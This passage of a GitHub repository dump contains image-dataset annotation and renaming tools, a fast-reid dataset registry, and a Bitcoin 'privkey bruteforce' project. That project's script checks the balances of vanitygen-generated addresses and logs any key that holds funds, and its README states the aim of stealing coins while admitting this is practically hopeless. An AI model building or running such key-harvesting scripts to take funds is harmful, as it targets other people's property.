self.img_list]\n\n def auto_annotation(self):\n for img in self.img_basename:\n width, height = Image.open(self.scr_img_dir + '/' + img).size\n img_name = os.path.splitext(img)[0]\n result_txt = open(self.scr_txt_dir + '/' + img_name + '.txt').read().splitlines()\n\n # 写入xml文件\n xml_file = open((self.scr_xml_dir + '/' + img_name + '.xml'), 'w')\n xml_file.write('<annotation>\\n')\n xml_file.write(' <folder>' + self.folder + '</folder>\\n')\n xml_file.write(' <filename>' + img + '</filename>\\n')\n xml_file.write(' <source>\\n')\n xml_file.write(' <database>Unknown</database>\\n')\n xml_file.write(' </source>\\n')\n xml_file.write(' <size>\\n')\n xml_file.write(' <width>' + str(width) + '</width>\\n')\n xml_file.write(' <height>' + str(height) + '</height>\\n')\n xml_file.write(' <depth>3</depth>\\n')\n xml_file.write(' </size>\\n')\n xml_file.write('\t<segmented>0</segmented>\\n')\n\n # 写入标注信息\n # 标注信息格式:识别名称 置信度 xmin ymin xmax ymax\n for each_label in result_txt:\n spt = each_label.split(' ')\n xml_file.write(' <object>\\n')\n xml_file.write(' <name>' + str(spt[0]) + '</name>\\n')\n xml_file.write(' <pose>Unspecified</pose>\\n')\n xml_file.write(' <truncated>0</truncated>\\n')\n xml_file.write(' <difficult>0</difficult>\\n')\n xml_file.write(' <bndbox>\\n')\n xml_file.write(' <xmin>' + str(spt[2]) + '</xmin>\\n')\n xml_file.write(' <ymin>' + str(spt[3]) + '</ymin>\\n')\n xml_file.write(' <xmax>' + str(spt[4]) + '</xmax>\\n')\n xml_file.write(' <ymax>' + str(spt[5]) + '</ymax>\\n')\n xml_file.write(' </bndbox>\\n')\n xml_file.write(' </object>\\n')\n \n xml_file.write('</annotation>')\n xml_file.close()\n\nif __name__ == \"__main__\":\n anno = Auto_ann()\n anno.auto_annotation()" }, { "alpha_fraction": 0.5098404288291931, "alphanum_fraction": 0.5284441113471985, "avg_line_length": 39.85599899291992, "blob_id": "48d3a802c60cc1e54fc0d605f7e65922c8e69cb6", "content_id": "2e0239e25f98f66baa9ca59702307ffb6b54585c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11355, "license_type": "no_license", "max_line_length": 175, "num_lines": 250, "path": "/pick_img.py", "repo_name": "CGump/dataset-tools", "src_encoding": "UTF-8", "text": "import glob\nimport os, shutil\n\nimport numpy as np\nimport xml.etree.ElementTree as ET\nfrom skimage import io, transform\nfrom PIL import Image\n\nimport cv2\n\n\nclass BatchPcik():\n '''\n 批量判断图片维度,并挑出不符合的文件至error文件夹\n !!!error文件夹如果没有可以新建功能!!!\n '''\n def __init__(self):\n self.imgdir_path = \"F:/Fruit_dataset/fresh_fish/\"\n self.xml_path = \"test/\"\n self.error_path = \"test/error/\"\n self.classes = [\"apple\",\"avocado\",\"banana\",\"beefsteak\",\"blueberry\",\"carambola\",\"cherries\",\"chicken\",\"coconut\",\"durian\",\n \"fig\",\"fish\",\"grape\",\"hamimelon\",\"hawthorn\",\"kiwano\",\"kiwi\",\"lemon\",\"litchi\",\"longan\",\"loquat\",\"mango\",\n \"mangosteen\",\"mulberry\",\"muskmelon\",\"orange\",\"pawpaw\",\"peach\",\"pear\",\"pemelo\",\"pepinomelon\",\"persimmon\",\n \"pineapple\",\"pitaya\",\"pomegranate\",\"rambutan\",\"strawberry\",\"watermelon\",\"waxberry\",\"mix\"]\n\n def read_image(self):\n\n w = 100\n h = 100\n c = 3\n path = self.imgdir_path\n cate = [path + x for x in os.listdir(path) if os.path.isdir(path+x)]\n images = []\n labels = []\n for index, folder in enumerate(cate):\n for im in glob.glob(folder + '/*.jpg'):\n img = io.imread(im)\n try:\n if img.shape[2] == c:\n img = transform.resize(img, (w, h))\n images.append(img)\n labels.append(index)\n print(im)\n else:\n print(im, ' IS WRONG')\n except:\n continue\n print('label %d is:' % index, folder)\n return np.asarray(images, np.float32), np.asarray(labels, np.int32)\n\n def find_wrong_pic(self, save_change=\"c\"):\n '''\n 处理非3通道、非RGB图片\n save_change: 为`\"c\"`时change模式,将非3通道、非RGB图片转换为3通道RGB图片\n 为`\"r\"`时remove模式,删除不符合的图片\n 为`\"m\"`时move模式,移动图片至指定文件夹\n '''\n filelist = os.listdir(self.imgdir_path)\n if save_change == \"c\":\n for filename in filelist: \n image_file = Image.open(self.imgdir_path + filename)\n image_file.convert('RGB').save(self.imgdir_path + filename)\n elif save_change == \"r\":\n for filename in filelist:\n os.remove(self.imgdir_path + filename)\n elif save_change == \"m\":\n is_exists = os.path.exists(self.error_path)\n os.makedirs(self.error_path) if not is_exists else print(\"目录已存在\")\n for filename in filelist:\n shutil.move(self.imgdir_path + filename, self.error_path)\n else:\n print(\"the config \\\"save_change\\\" must choose in 'c' or 'r' or 'm'\")\n \n return True\n\n def rename (self, pic_name, batch, i_num):\n '''\n 待修改\n 功能:不同文件夹内图像批量重命名,要求文件夹命名格式一致\n 或者文件夹内重命名,单独某一类\n 以上两者需要可以同时实现,分类选择\n '''\n filelist = os.listdir(self.imgdir_path) #获取文件路径 \n total_num = len(filelist) #获取文件长度(个数) \n i = i_num #表示文件的命名是从1开始的 \n for item in filelist:\n if item.endswith('.jpg'): #初始的图片的格式为jpg格式的(或者源文件是png格式及其他格式,后面的转换格式就可以调整为自己需要的格式即可)\n src = os.path.join(os.path.abspath(self.imgdir_path), item) \n #dst = os.path.join(os.path.abspath(self.imgdir_path), ''+ '00' str(i) + pic_name + '.jpg') #处理后的格式也为jpg格式的,当然这里可以改成png格式 \n dst = os.path.join(os.path.abspath(self.imgdir_path), pic_name + '_' + batch + '_' + format(str(i), '0>4s') + '.jpg') #这种情况下的命名格式为0000000.jpg形式,可以自主定义想要的格式 \n try: \n os.rename(src, dst) \n print ('converting %s to %s ...' % (src, dst)) \n i = i + 1\n except: \n continue\n print ('total %d to rename & converted %d jpgs' % (total_num, i))\n\n def rename_batch (self, batch, suffix='.jpg', i_num=1):\n '''\n 数据集名称中标签项修改,例如: \n apple_01_0001.jpg -> apple_04_0001.jpg \n apple_01_0001.xml -> apple_04_0001.xml \n batch: 修改后的批次名称 \n suffix: 文件的后缀名 \n i_num: 文件的序号 \n '''\n filelist = os.listdir(self.imgdir_path) # 获取文件路径 \n for filename in filelist:\n pic_1, _, pic_3 = filename.split('_') # 获取文件名,序号+后缀\n if (pic_1 in self.classes) and filename.endswith(suffix): \n src = os.path.join(os.path.abspath(self.imgdir_path), filename) \n dst = os.path.join(os.path.abspath(self.imgdir_path), pic_1 + '_' + batch + '_' + pic_3)\n try: \n os.rename(src, dst) \n print ('converting %s to %s ...' % (src, dst)) \n i_num = i_num + 1\n except: \n continue\n print ('total %d to rename & converted %d jpgs' % (len(filelist), i_num-1))\n\n def rename_dataset(self, batch, suffix='.jpg', xml_suffix='.xml'):\n '''\n 修改数据集批次信息,包括图片名和xml标注文件名,以及标注文件内的图片名和图片路径\n apple_01_0001.jpg -> apple_04_0001.jpg \n apple_01_0001.xml -> apple_04_0001.xml \n batch:`str`,修改后的批次号\n suffix:图像的后缀名,默认为`.jpg`\n xml_suffix:标注文件后缀名,默认为`.xml`\n '''\n filelist = os.listdir(self.imgdir_path) # 获取文件路径 \n for filename in filelist:\n # filename已知 filename=\"apple_01_0001.jpg\" 修改前\n pic_1, _, pic_3 = filename.split('_') # apple 01 0001.jpg\n seach_name = filename.split('.')[0] # 用来索引xml文件的apple_01_0001\n new_pic_name = pic_1 + '_' + batch + '_' + pic_3 # 新名字apple_04_0001.jpg\n xml_name = seach_name + xml_suffix # xml_name 此时为修改前 apple_01_0001.xml\n xml_1, _, xml_3 = xml_name.split('_') # 提取出来后:apple 01 0001.xml\n new_xml_name = xml_1 + '_' + batch + '_' + xml_3 # 重新组合批次信息,apple_04\n\n if (pic_1 in self.classes) and filename.endswith(suffix):\n src = os.path.join(os.path.abspath(self.imgdir_path), filename)\n dst = os.path.join(os.path.abspath(self.imgdir_path), new_pic_name)\n src_xml = os.path.join(os.path.abspath(self.xml_path), xml_name)\n dst_xml = os.path.join(os.path.abspath(self.xml_path), new_xml_name)\n\n doc = ET.parse(self.xml_path + xml_name)\n root = doc.getroot()\n root.find(\"filename\").text = new_pic_name\n root.find(\"path\").text = self.imgdir_path + new_pic_name\n doc.write(self.xml_path + xml_name)\n\n try:\n os.rename(src, dst)\n os.rename(src_xml, dst_xml)\n print(\"---filename:%s has been modified---\"%(filename))\n except:\n continue\n\n def change_xml_all(self, suffix='.jpg'):\n '''\n 修改xml文件中的filename和path \n xml文件的文件名与其内部filename和path不对应 \n 通过xml文件名提取信息,拼装`.jpg`后缀即可\n suffix:默认后缀为`.jpg`\n '''\n filelist = os.listdir(self.xml_path)\n for xmlfile in filelist:\n doc = ET.parse(self.xml_path + xmlfile)\n root = doc.getroot()\n alter1 = root.find('filename')\n alter1.text = xmlfile.split('.')[0] + suffix\n\n alter2 = root.find('path')\n alter2.text = alter2.text.rsplit('\\\\', 1)[0] + '\\\\' + xmlfile.split('.')[0] + suffix\n doc.write(self.xml_path + xmlfile)\n print(\"---done---\")\n\n def get_train_name(self, write_path, suffix='.jpg'):\n '''\n 读取数据集中所有图像的名称,并写入文本文件\n write_path:文本文件的存放路径\n '''\n filelist = os.listdir(self.imgdir_path)\n filelist.sort() # 原地修改\n f = open(write_path, 'w')\n for filename in filelist:\n if filename.endswith(suffix):\n write_name = filename.split('.')[0] + '\\n'\n f.write(write_name)\n f.close()\n\nif __name__ == \"__main__\":\n demo = BatchPcik()\n #demo.error_path = \"F:/Fruit_dataset/pick_img/error_img/\"\n key = 2\n if key == 1 :\n # 测试修改批次号方法\n demo.imgdir_path = \"E:/fruit_server/VOCdevkit/VOC2007/Annotations/\"\n demo.classes = [\"apple\"]\n batch = \"04\"\n demo.rename_batch(batch, suffix='.xml') \n elif key == 2:\n #demo.classes = [\"apple\", \"avocado\", \"broccoli\", \"carrot\", \"chinese-cabbage\", \"coconut\",\n # \"corn\", \"hami-melon\", \"lemon\", \"mix\" ,\"onion\", \"orange\", \"pear\", \n # \"pomegranate\", \"pomelo\", \"sweet-potato\"]\n demo.classes = [\"hami-melon\"]\n for class_name in demo.classes:\n demo.imgdir_path = 'E:/fruit_server/15/%s'%(class_name) \n demo.rename(class_name, batch='05', i_num=1)\n elif key == 3:\n demo.xml_path = \"E:/fruit_server/VOCdevkit/VOC2007/Annotations/\"\n demo.change_xml_all()\n elif key == 4:\n # 同时修改图片名,标注名和标注信息内的图片名、图片地址\n demo.imgdir_path = \"E:/fruit_server/VOCdevkit/VOC2007/JPEGImages/\"\n demo.xml_path = \"E:/fruit_server/VOCdevkit/VOC2007/Annotations/\"\n demo.classes = [\"apple\",\"kiwi\",\"mango\",\"mangosteen\",\"mix\",\"orange\",\"pear\",\"peach\",\"pomegranate\"]\n demo.rename_dataset(\"04\")\n elif key == 5:\n demo.imgdir_path = \"VOC2007/JPEGImages/\"\n write_path = \"VOC2007/ImageSets/Main/train.txt\"\n demo.get_train_name(write_path)\n \n elif key == 6:\n demo.imgdir_path = \"test/error_img/\"\n demo.find_wrong_pic(save_change='m')\n\n elif key == 10:\n classes.append('mix')\n for class_name in classes:\n dirpath = \"F:/Fruit_dataset/yolo_39class/test_image/%s\"%(class_name)\n os.makedirs(dirpath)\n print(\"New folder has been done!-->\" + dirpath)\n else:\n # 测试集制作\n classes.append('mix')\n for class_name in classes:\n batch = 'test'\n i_num = 1\n demo.imgdir_path = \"F:/Fruit_dataset/yolo_39class/test_image/%s/\"%(class_name)\n demo.find_wrong_pic()\n demo.rename(class_name, batch, i_num) \n \n '''\n else:\n demo.imgdir_path = \"F:/Fruit_dataset/meat_train/test/\"\n data, label = demo.read_image()\n print(data.shape) \n '''" }, { "alpha_fraction": 0.7931034564971924, "alphanum_fraction": 0.7931034564971924, "avg_line_length": 13.5, "blob_id": "170e2723d78b2fc6242cb8dc1dfb3466c7cd9407", "content_id": "b3d8a1a01852721cb2f8e97a33d68fb0a6835760", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 51, "license_type": "no_license", "max_line_length": 15, "num_lines": 2, "path": "/README.md", "repo_name": "CGump/dataset-tools", "src_encoding": "UTF-8", "text": "# dataset-tools\n 一些处理数据集的小工具\n" }, { "alpha_fraction": 0.5985184907913208, "alphanum_fraction": 0.6118518710136414, "avg_line_length": 21.433332443237305, "blob_id": "9276644767ec9d1787b69edc22b536f7febc147c", "content_id": "bc6e3aa83a7e5685acc14d899e7066fb53afc612", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 675, "license_type": "no_license", "max_line_length": 52, "num_lines": 30, "path": "/voc_tool.py", "repo_name": "CGump/dataset-tools", "src_encoding": "UTF-8", "text": "import os \nimport random \n\nroot = 'VOCdevkit/VOC2007/'\ntrain = 0.9 \nval = 0.1 \nxmlfilepath = root + 'Annotations' \ntxtsavepath = root + 'ImageSets/Main' \ntotal_xml = os.listdir(xmlfilepath) \n \nnum = len(total_xml) \nlist = range(num) \ntv = int(num * train) \ntrain_num = random.sample(list, tv) \n \nftrainval = open(txtsavepath+'/trainval.txt', 'w') \nftrain = open(txtsavepath+'/train.txt', 'w') \nfval = open(txtsavepath+'/val.txt', 'w') \n\nfor i in list: \n name=total_xml[i][:-4]+'\\n' \n ftrainval.write(name)\n if i in train_num: \n ftrain.write(name) \n else: \n fval.write(name) \n \nftrainval.close() \nftrain.close() \nfval.close() \n" } ]
5
wangguanan/fast-reid
https://github.com/wangguanan/fast-reid
320a28a8e20de6ee6075391774bd776d678d2c5c
7e2bc6873fadd320cdd4c0077dad5c7f1a94218e
ab3d7e6c38c7dbdc876cecaac3d7a6a6e9f882d7
refs/heads/master
2022-12-08T14:55:03.463977
2020-09-08T03:14:05
2020-09-08T03:14:05
285,167,273
2
0
null
2020-08-05T03:22:56
2020-08-04T11:50:09
2020-08-04T08:00:23
null
[ { "alpha_fraction": 0.730983316898346, "alphanum_fraction": 0.7486085295677185, "avg_line_length": 27.135135650634766, "blob_id": "e99241e1c4a515149ebb8764d399b0fdac653e88", "content_id": "80e7467bfe74db80227a3cf9ffc242a2a98393b4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1078, "license_type": "permissive", "max_line_length": 87, "num_lines": 37, "path": "/fastreid/data/datasets/__init__.py", "repo_name": "wangguanan/fast-reid", "src_encoding": "UTF-8", "text": "# encoding: utf-8\r\n\"\"\"\r\n@author: liaoxingyu\r\n@contact: [email protected]\r\n\"\"\"\r\n\r\nfrom ...utils.registry import Registry\r\n\r\nDATASET_REGISTRY = Registry(\"DATASET\")\r\nDATASET_REGISTRY.__doc__ = \"\"\"\r\nRegistry for datasets\r\nIt must returns an instance of :class:`Backbone`.\r\n\"\"\"\r\n\r\n# Person re-id datasets\r\nfrom .cuhk03 import CUHK03\r\nfrom .dukemtmcreid import DukeMTMC\r\nfrom .market1501 import Market1501\r\nfrom .msmt17 import MSMT17\r\nfrom .AirportALERT import AirportALERT\r\nfrom .iLIDS import iLIDS\r\nfrom .pku import PKU\r\nfrom .prai import PRAI\r\nfrom .sensereid import SenseReID\r\nfrom .sysu_mm import SYSU_mm\r\nfrom .thermalworld import Thermalworld\r\nfrom .pes3d import PeS3D\r\nfrom .caviara import CAVIARa\r\nfrom .viper import VIPeR\r\nfrom .lpw import LPW\r\nfrom .shinpuhkan import Shinpuhkan\r\n# Vehicle re-id datasets\r\nfrom .veri import VeRi\r\nfrom .vehicleid import VehicleID, SmallVehicleID, MediumVehicleID, LargeVehicleID\r\nfrom .veriwild import VeRiWild, SmallVeRiWild, MediumVeRiWild, LargeVeRiWild\r\n\r\n__all__ = [k for k in globals().keys() if \"builtin\" not in k and not k.startswith(\"_\")]\r\n" } ]
1
yadav-sachin/profQuest
https://github.com/yadav-sachin/profQuest
5c12b4c1bbf867fd213dd680093736f00ccba900
7980a8c17726761d007cf134a587569ca2c035ea
79d46aa964f6f21417497206209af7bf244ae4a1
refs/heads/main
2023-04-20T07:44:23.533699
2021-05-11T01:57:43
2021-05-11T01:57:43
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7662337422370911, "alphanum_fraction": 0.7662337422370911, "avg_line_length": 5.900000095367432, "blob_id": "08f15e8f97d54c5cb5055c5b129133f5187f7e24", "content_id": "3596b33fb7a47c0f387513f1d314a3f612e8397c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 77, "license_type": "no_license", "max_line_length": 9, "num_lines": 10, "path": "/requirements.txt", "repo_name": "yadav-sachin/profQuest", "src_encoding": "UTF-8", "text": "scrapy\r\njsonlines\r\nflask\r\nnltk\r\nsklearn\r\npickle\r\nscipy\r\ndifflib\r\nheapq\r\nnumpy" }, { "alpha_fraction": 0.6719056963920593, "alphanum_fraction": 0.673870325088501, "avg_line_length": 32.93333435058594, "blob_id": "814c1e1440bad5641584f3f6d1c2cade17ea7989", "content_id": "3edd403b6f8077b5d40f758b19e20a7b1c4e9fea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 509, "license_type": "no_license", "max_line_length": 130, "num_lines": 15, "path": "/trash/html_data_exists?.py", "repo_name": "yadav-sachin/profQuest", "src_encoding": "UTF-8", "text": "from os import listdir\nfrom os.path import isfile, join\nimport jsonlines\ncountry = \"india\"\n# country = input()\nhtml_files = [f for f in listdir(\"data/output_data/{}\".format(country)) if isfile(join(\"data/output_data/{}\".format(country), f))]\nhtml_file_names = [name.split('.')[0] for name in html_files]\n\n\nwith jsonlines.open('oup_{}.jl'.format(country)) as reader:\n for obj in reader:\n if obj['user'] in html_file_names:\n html_file_names.remove(obj['user'])\n\nprint(len(html_file_names))\n" } ]
2
TheZ3ro/bitcoin-privkey-bruteforce
https://github.com/TheZ3ro/bitcoin-privkey-bruteforce
d01732ff9b7d6c79d983b7e8b354a2888dc6cb77
05d2c275dca25e5ff0c232037ac6229acaced4d7
02c75d49740afb88b58b9d5296bd131c4136247e
refs/heads/master
2016-09-07T11:04:39.113182
2014-11-19T13:10:51
2014-11-19T13:10:51
26,860,756
3
2
null
null
null
null
null
[ { "alpha_fraction": 0.6629955768585205, "alphanum_fraction": 0.7466960549354553, "avg_line_length": 35.31999969482422, "blob_id": "0c4ad5996eeb97708de694721b5705fde2188507", "content_id": "1ca38f32e97feef54f76ce2dc58cb7b26e82d3b4", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 908, "license_type": "permissive", "max_line_length": 116, "num_lines": 25, "path": "/README.md", "repo_name": "TheZ3ro/bitcoin-privkey-bruteforce", "src_encoding": "UTF-8", "text": "bitcoin-privkey-bruteforce\n==========================\n\nDemo for a Bruteforce on the Bitcoin Address Privkey\n\nDeveloped for Fun\n\nThe script (btcscan.py) takes a vanitygen's log file and parse it to check the\nbalance of the generated addresses.\n\nExecute vanitygen like this:\n```vanitygen 1 -ko <filename>```\n\nthen after some (thousand) match execute btcscan.py:\n```./btcscan.py <filename> >> a.log```\n\nIf it's found an address with some balance the script will print out the key and the BTC ammount\nso we can steal some Bitcoin.\n\nIf my calculation aren't wrong:\nWe have ```58^34 => 904798310844700775313327215140493940623303545877497699631104```\npossible Bitcoin adressed (1 base58 char for 34 position in the address) and the daily\nnumber of address used is ~170000 (source [blockchain.info](https://blockchain.info/it/charts/n-unique-addresses) )\n\nSo, If you think you can steal some BTC, you are a fool :D\n" }, { "alpha_fraction": 0.6623443961143494, "alphanum_fraction": 0.6856846213340759, "avg_line_length": 25.410959243774414, "blob_id": "2038eb2b61253135f565490af563989bbe61f97c", "content_id": "469570549aa935c4451d737cca8b95cc6a24b555", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1928, "license_type": "permissive", "max_line_length": 91, "num_lines": 73, "path": "/btcscan.py", "repo_name": "TheZ3ro/bitcoin-privkey-bruteforce", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#TheZero\n#This code is under Public Domain\n\nimport sys\nimport urllib2\nimport json\nfrom threading import Thread\nfrom time import sleep\nthreads = []\njackpot = []\naddr=\"\"\nn=0\n\n# http://bitcoin-abe.info/chain/Bitcoin/q/addressbalance/1AFhryVU44AEGt3WxWpaqbKVKPPcNk8BfC\n# -direct integer response\n# http://blockchain.info/address/1AFhryVU44AEGt3WxWpaqbKVKPPcNk8BfC?format=json\n# -json_data[\"final_balance\"]\n# http://btc.blockr.io/api/v1/address/info/1AFhryVU44AEGt3WxWpaqbKVKPPcNk8BfC\n# -json_data[\"data\"][\"balance\"]\n# http://webbtc.com/address/1AFhryVU44AEGt3WxWpaqbKVKPPcNk8BfC.json\n# -json_data[\"balance\"]\n# https://mainnet.helloblock.io/v1/addresses/1AFhryVU44AEGt3WxWpaqbKVKPPcNk8BfC\n# -json_data[\"data\"][\"address\"][\"balance\"]\n\ndef scan(address,pkey): \n\treq = urllib2.Request(\"http://btc.blockr.io/api/v1/address/info/\"+address+\"\")\n\tres = urllib2.urlopen(req)\n\tjson_data = json.load(res)\n\t#print address+\" \"+pkey+\" \"+str(json_data[\"data\"][\"balance\"])\n\tif json_data[\"data\"][\"balance\"]>=0.01:\n\t\tprint address+\" \"+pkey+\" \"+str(json_data[\"data\"][\"balance\"])\n\t\tjackpot.append(address+\" \"+pkey+\" \"+str(json_data[\"data\"][\"balance\"]))\n\nif len(sys.argv)!=2:\n\texit()\n\ntry:\n\tf = open(sys.argv[1], \"r\")\n\ttry:\n\t\t# read all the lines into a list.\n\t\tlines = f.readlines()\n\tfinally:\n\t\tf.close()\nexcept IOError:\n\tpass\n\nfor line in lines:\n\tif line.startswith(\"Address: \"):\n\t\taddr=line[9:-1]\n\tif line.startswith(\"Privkey: \"):\n\t\tt = Thread(target=scan, args=(addr,line[9:]))\n\t\tthreads.append(t)\n\t\tt.start()\n\t\tsleep(1)\n\t\tn+=1\n\t\tprint str(n)+\" \"+str((n*3)-2)+\" \"+str(len(jackpot))\n\n#[x.join() for x in threads]\n\nif len(jackpot)>0:\n\tprint \"\\n---------------------------\\nYou WIN THIS JACKPOT! \"+ str(len(jackpot))\n\t\ntry:\n\t# This tries to open an existing file but creates a new file if necessary.\n\tlogfile = open(\"jackpot.txt\", \"a\")\n\ttry:\n\t\tfor j in jackpot:\n\t\t\tlogfile.write(j)\n\tfinally:\n\t\tlogfile.close()\nexcept IOError:\n\tpass\n" } ]
2